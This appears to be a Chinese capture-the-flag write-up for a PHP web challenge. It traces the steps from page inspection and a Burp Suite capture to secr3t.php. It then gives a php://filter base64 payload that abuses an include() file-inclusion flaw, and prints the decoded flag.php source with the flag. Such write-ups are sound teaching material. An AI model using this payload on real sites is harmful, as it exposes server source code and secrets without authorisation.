首先看到一串字,并没有什么有用的信息。
F12查看一下有没有有用的信息。
发现Archive_room.php,先把下面看完,没有新的发现。
就去访问一下Archive_room.php,发现一个按钮,点击后显示
应该是重定向到别的网页上了。那就用burpsuite抓包。
抓包得到:
发现了一个新文件。
去访问一下secr3t.php
有用的信息有4条:1.highlight_file(_FILE_);会在这个网页上显示file文件
2.对于file文件的值有一个过滤的操作,分别为../ tp input 过滤了目录穿越和伪协议的部分协议,提示到我应该使用伪协议。
3.include()函数,有着文件包含漏洞
4.flag在flag.php中
先去访问flag.php,没有发现flag
考虑到可以使用文件包含漏洞的伪协议filter。php://filter/convert.base64-encode/resource=flag.php
最后的payload:?file=php://filter/convert.base64-encode/resource=flag.php
得到一大串base64加密的字符串后拿去解密就可以得到flag.php的源码了
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>FLAG</title>
</head>
<body style=""><br><br><br><br><br><br>
<h1 style="font-family:verdana;color:red;text-align:center;">ååï¼ä½ æ¾å°æäºï¼å¯æ¯ä½ çä¸å°æQAQ~~~</h1><br><br><br>
<p style="font-family:arial;color:red;font-size:20px;text-align:center;">
<?php
echo "æå°±å¨è¿é";
$flag = 'flag{b2e3738e-af25-4509-a2c8-329407bbb4a1}';
$secret = 'jiAng_Luyuan_w4nts_a_g1rIfri3nd'
?>
</p>
</body>
</html>